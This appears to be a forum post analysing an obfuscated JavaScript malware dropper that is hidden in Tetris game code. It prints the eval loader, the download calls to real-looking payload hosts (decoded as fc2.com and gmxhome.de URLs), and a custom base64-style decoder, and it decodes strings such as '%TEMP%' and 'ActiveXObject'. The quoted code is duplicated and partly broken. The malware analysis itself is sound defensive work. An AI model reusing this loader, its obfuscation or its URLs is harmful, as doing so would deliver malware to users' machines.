eval("IGZ1bmN0aW9uIHZvdGdvcm9kYXphc3Bpbm95aXB1dGtvcm.........XB1dGtvcm9oZUNDQ2NjYTsNCn07".manysecretthings());
Tetromino.prototype.getNew = function (index) { this.x = 4; index = 6; this.index = index; switch (index) { case 1: this.frameNumber = 1; this.sprite = 5; this.sprite = 1; this.frame = new Array( new Array( new Array(0, -1), new Array(0, 0), new Array(1, -1), new Array(1, 0) ) ); break; case 2:this.frameNumber = 4; this.sprite = 4; this.sprite = 2; this.frame = new Array( new Array( new Array(2, 0), new Array(-1, 0), new Array(0, 0), new Array(1, 0) ), new Array( new Array(1, -1), new Array(1, 0), new Array(1, 1), new Array(1, 2) ), new Array( new Array(2, 1), new Array(-1, 1), new Array(0, 1), new Array(1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(0, 2) ) ); break; case 3:this.frameNumber = 4; this.sprite = 7; this.sprite = 3; this.frame = new Array( new Array( new Array(1, -1), new Array(0, -1), new Array(0, 0), new Array(-1, 0) ), new Array( new Array(0, -1), new Array(0, 0), new Array(1, 0), new Array(1, 1) ), new Array( new Array(1, -1), new Array(0, -1), new Array(0, 0), new Array(-1, 0) ), new Array( new Array(-1, -1), new Array(-1, 0), new Array(0, 0), new Array(0, 1) ) ); break; case 4: this.sprite = 2; this.sprite = 4; this.frameNumber = 2; this.frame = new Array( new Array( new Array(-1, -1), new Array(0, -1), new Array(0, 0), new Array(1, 0) ), new Array( new Array(0, 0), new Array(1, 0), new Array(0, 1), new Array(1, -1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(0, 1), new Array(1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(-1, 0), new Array(-1, 1) ) ); break; case 5:this.frameNumber = 4; this.sprite = 3; this.sprite = 5; this.frame = new Array( new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(1, -1) ), new Array( new Array(-1, -1), new Array(0, -1), new Array(0, 0), new Array(0, 1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(-1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(1, 1) ) ); break; case 6: this.sprite = 1; this.sprite = 6; this.frameNumber = 4; this.frame = new Array( new Array( new Array(-1, -1), new Array(-1, 0), new Array(0, 0), new Array(1, 0) ), new Array( new Array(0, -1), new Array(-1, -1), new Array(-1, 0), new Array(-1, 1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(1, 1) ), new Array( new Array(1, -1), new Array(1, 0), new Array(1, 1), new Array(0, 1) ) ); break; case 7: this.sprite = 6; this.sprite = 7; this.frameNumber = 4; this.frame = new Array( new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(0, -1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(-1, 0) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(0, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(1, 0) ) ); break; }};
};
...
try{
Shtyler4("http://"+"\u0068e\u0072i\u006Da\u0073u"+"\u002Ew\u0065b\u002Ef\u00632\u002Ec\u006Fm\u002F0\u0039u\u0039j\u006E8\u0037" + "?AMLXoFbQSk=KGkINlTdQz","JlLQdKnWwif");
}catch(votgorodazaspinoyiputkoroheuUxUroNK){}
try{
Shtyler4("http://"+"\u00312\u0035r\u0075"+".\u0077e\u0062.\u0066c\u0032.\u0063o\u006D/\u00309\u00759\u006An\u00387" + "?yMsjsVxGF=efxMvO","bsMnCcz");
}catch(votgorodazaspinoyiputkoroheSaqWtHkKPQ){}
try{
Shtyler4("http://"+"\u0068r\u0065n\u006Ee\u0072"+".\u0067m\u0078h\u006Fm\u0065.\u0064e\u002F0\u0039u\u0039j\u006E8\u0037" + "?xBpCVMC=cLVucBgsR","FgGsqpxH");
}catch(votgorodazaspinoyiputkoroheIqjwksMIt){}
Look at the end :
try{
Shtyler4("http://"+"\u0068e\u0072i\u006Da\u0073u"+"\u002Ew\u0065b\u002Ef\u00632\u002Ec\u006Fm\u002F0\u0039u\u0039j\u006E8\u0037" + "?AMLXoFbQSk=KGkINlTdQz","JlLQdKnWwif");
}catch(votgorodazaspinoyiputkoroheuUxUroNK){}
try{
Shtyler4("http://"+"\u00312\u0035r\u0075"+".\u0077e\u0062.\u0066c\u0032.\u0063o\u006D/\u00309\u00759\u006An\u00387" + "?yMsjsVxGF=efxMvO","bsMnCcz");
}catch(votgorodazaspinoyiputkoroheSaqWtHkKPQ){}
try{
Shtyler4("http://"+"\u0068r\u0065n\u006Ee\u0072"+".\u0067m\u0078h\u006Fm\u0065.\u0064e\u002F0\u0039u\u0039j\u006E8\u0037" + "?xBpCVMC=cLVucBgsR","FgGsqpxH");
}catch(votgorodazaspinoyiputkoroheIqjwksMIt){}
- Using the tool I linked in part (1) :
http://"+"herimasu"+".web.fc2.com/09u9jn87" + "?AMLXoFbQSk=KGkINlTdQz"
http://"+"125ru"+".web.fc2.com/09u9jn87" + "?yMsjsVxGF=efxMvO
http://"+"hrenner"+".gmxhome.de/09u9jn87" + "?xBpCVMC=cLVucBgsR"
My first interrogation when I saw this part : "Why doesn't they put URLs in a as easy to retrieve way ?!".
My second interrogation was "are this real used URLs to download payloads ?!"
This first and third URLs are blocked by KTS cloud
The second exist no more : 403
Because the very interesting part is the deobfuscation from their "chaotic" source, make me curious and make me want to completely deobfuscate it ( to see the real parts used, etc...)
3)
Let's investigate more
var sirdallos ="RAPAPIPATARXhwYW5RAPAPIPATAkRW52aXRAPAPIPATAJvbm1lbnRTdHJRAPAPIPATApbmdz".manysecretthings();
A lot of strange strings are using the same function : manysecretthings();
=> lol, very explicit name they gave it
The most important string used this way, are 8492 chars long
manysecretthings() uses char code BITWISE operations : AND, OR , SHR, SHL
and uses also an array to retrieve the good char code from calculated values : lulalula
String.prototype.manysecretthings = function() {
var c1, c2, c3, c4;
var i, len, out;
var str = this.replace(/RAPAPIPATA/g, ''); // remove all "RAPAPIPATA" strings
len = str.length; // lenth of the new string
i = 0;
out = "";
while (i < len) { // Principal loop
break;
c4 = str.charCodeAt(i++) & 0xff;
} // end of principal while
return out; // string decrypted
};
var c1, c2, c3, c4;
var i, len, out;
var str = this.replace(/RAPAPIPATA/g, ''); // remove all "RAPAPIPATA" strings
len = str.length; // lenth of the new string
i = 0;
out = "";
while (i < len) { // Principal loop
do {
if (c1 == -1)
break;
var dodo = false;
if (c2 == -1)
break;
out += String.fromCharCode((c1 << 2) | ((c2 & 0x30) >> 4));
do {
if (c3 == -1)c1 = lulalula[str.charCodeAt(i++) & 0xff];
} while (i < len && c1 == -1);
if (c1 == -1)
break;
var dodo = false;
do {c2 = lulalula[str.charCodeAt(i++) & 0xff];
dodo = i < len && c2 == -1;
} while (dodo);dodo = i < len && c2 == -1;
if (c2 == -1)
break;
out += String.fromCharCode((c1 << 2) | ((c2 & 0x30) >> 4));
do {
c3 = str.charCodeAt(i++) & 0xff;
if (c3 == 61)
return out;
c3 = lulalula[c3];
} while (i < len && c3 == -1);if (c3 == 61)
return out;
c3 = lulalula[c3];
break;
out += String.fromCharCode(((c2 & 0XF) << 4) | ((c3 & 0x3c) >> 2));
do {c4 = str.charCodeAt(i++) & 0xff;
if (c4 == 61)
return out;
c4 = lulalula[c4];
} while (i < len && c4 == -1);
if (c4 == -1)
break;
out += String.fromCharCode(((c3 & 0x03) << 6) | c4);
return out;
c4 = lulalula[c4];
} while (i < len && c4 == -1);
if (c4 == -1)
break;
out += String.fromCharCode(((c3 & 0x03) << 6) | c4);
return out; // string decrypted
};
var lulalula = new Array(4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,67,4,4,4,68,57,58,59,60,61,62,63,64,65,66,4,4,4,4,4,4,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,4,4,4,4,4,4,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4);
var lulalulaI, lulalulan = lulalula.length;
for (lulalulaI= 0; lulalulaI < lulalulan; ++lulalulaI) {
lulalula[lulalulaI] = lulalula[lulalulaI] - 5;
} // here the real values of lulalula are in place
var lulalulaI, lulalulan = lulalula.length;
for (lulalulaI= 0; lulalulaI < lulalulan; ++lulalulaI) {
lulalula[lulalulaI] = lulalula[lulalulaI] - 5;
} // here the real values of lulalula are in place
Let's test :
var VARDOCF ="JVRFTVAl".manysecretthings();
=> "%TEMP%"
var finde = "QWN0aXZlWE9iamVjdARAPAPIPATA=RAPAPIPATA=RAPAPIPATA".manysecretthings();
=> "ActiveXObject"
Last edited: